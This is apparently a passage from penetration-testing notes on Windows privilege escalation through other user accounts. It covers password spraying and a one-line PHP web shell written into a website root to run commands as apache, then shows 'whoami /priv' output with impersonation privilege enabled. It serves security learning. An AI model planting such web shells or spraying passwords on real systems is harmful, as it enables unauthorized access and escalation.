Other Users
So just like linux, whenever we see other users, we try to spam passwords and see if we can get access to other users who could possibly have more privilege.
So lets say in Windows we enumerate the users and we see that there is an apache user. In that same computer there is also a website running. So, chances are if we are able to overwrite files in the location of the website, we will be executing code as the user apache.
Lets take this case for example, we wrote a php file that did the following.
<pre>
<?php
system($_GET['cmd']);
?>
</pre>
It allows us to execute commands. As our current user we were able to write this file into the root directory of the website and be able to run it.
Then it turned out that the user apache had impersonation privileges.
C:\Users\apache>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Last updated